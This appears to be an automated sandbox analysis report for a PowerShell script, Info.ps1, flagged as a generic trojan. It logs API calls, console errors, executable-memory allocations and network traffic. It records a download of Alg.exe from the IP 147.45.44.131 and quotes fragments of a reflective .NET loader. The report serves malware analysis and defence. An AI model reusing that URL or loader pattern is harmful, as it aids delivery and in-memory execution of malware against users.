Summary | ZeroBOX

Info.ps1

Generic Malware Antivirus
Category: FILE
Machine: s1_win7_x6402
Started: Aug. 10, 2024, 5:33 p.m.
Completed: Aug. 10, 2024, 5:35 p.m.
Size 4.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 2ff0359741c6894d5625d156e0dba750
SHA256 ab8125a8e970c4782f802a76286a40452dca18771a391adbe91a888b3620115a
CRC32 05749C0D
ssdeep 96:i+SqlFtfjqcqtq2qVRiqbqEqMqzb5176zdM1pFzw7g:ipqlFtfjV2TQRi+/RqzV176zdM1Pws
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
147.45.44.131 Active Moloch
164.124.101.2 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: '13312 bytes loaded from System.Management.Automation, Version=1.0.0.0, Cultur
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: e=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An atte
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: mpt was made to load a program with an incorrect format."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:7 char:47
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + $assembly = [System.Reflection.Assembly]::Load <<<< ($fileBytes)
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: At line:13 char:19
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: + $entryPoint.Invoke <<<< ($null, $params)
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeExc
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: eption
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : InvokeMethodOnNull
console_handle: 0x0000005f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ae110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

buffer: f ,ÏĜ(È핤õ¨6o9ÓÎN#@"çÏ:tïŎ;
crypto_handle: 0x003ae110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ae290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://147.45.44.131/files/Alg.exe
request: GET http://147.45.44.131/files/Alg.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02689000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05620000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05621000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05630000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02912000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02913000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05446000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05447000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05622000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 2162688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06980000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06981000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06982000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06983000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06984000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05623000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05624000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05625000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05626000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05448000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05627000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05431000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05631000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Avast Other:Malware-gen [Trj]
AVG Other:Malware-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received
HTTP/1.1 200 OK
Date: Sat, 10 Aug 2024 08:33:50 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Tue, 06 Aug 2024 22:42:12 GMT
ETag: "3400-61f0b812b7b78"
Accept-Ranges: bytes
Content-Length: 13312
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

[binary PE body omitted: begins with the MZ header and the DOS stub "This program cannot be run in DOS mode.", with sections .text, .rsrc and .reloc]
Data sent
GET /files/Alg.exe HTTP/1.1
Host: 147.45.44.131
Connection: Keep-Alive
host 147.45.44.131
Time & API Arguments Status Return Repeated

send

buffer: GET /files/Alg.exe HTTP/1.1 / Host: 147.45.44.131 / Connection: Keep-Alive
socket: 1584
sent: 76
1 76 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK / Date: Sat, 10 Aug 2024 08:33:50 GMT / Server: Apache/2.4.52 (Ubuntu) / Last-Modified: Tue, 06 Aug 2024 22:42:12 GMT / ETag: "3400-61f0b812b7b78" / Accept-Ranges: bytes / Content-Length: 13312 / Keep-Alive: timeout=5, max=100 / Connection: Keep-Alive / Content-Type: application/x-msdos-program / [binary PE body omitted: begins with the MZ header and the DOS stub "This program cannot be run in DOS mode.", with sections .text, .rsrc and .reloc]
received: 2720
socket: 1584
1 2720 0